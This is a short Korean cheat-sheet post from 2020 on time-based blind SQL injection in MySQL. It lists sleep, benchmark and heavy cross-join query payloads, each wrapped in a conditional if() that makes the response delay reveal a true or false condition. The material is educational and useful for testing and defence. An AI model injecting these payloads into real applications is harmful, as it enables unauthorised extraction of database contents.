SQLi
MySQL Time SQLi(sleep, BENCHMARK, heavy query)
JoGeun
2020. 4. 27. 11:32
Sleep
| select sleep(3) |
| select if(1=1,sleep(3),2) |
Benchmark
benchmark(돌릴 횟수, 돌릴함수) 함수는 돌릴 함수에 대하여 몇번의 횟수를 반복하는지를 나타냄 이 방식을 통해 Time SQLi가 가능함
| select benchmark(1000000,md5(1)) |
| select if(1=1,benchmark(1000000,md5(1)),2) |
Heavy Query
| select count(*) from information_schema.tables tab1, information_schema.tables tab2, information_schema.tables tab3 |
| select if(1=1, (select count(*) from information_schema.tables tab1, information_schema.tables tab2, information_schema.tables tab3), 2) |
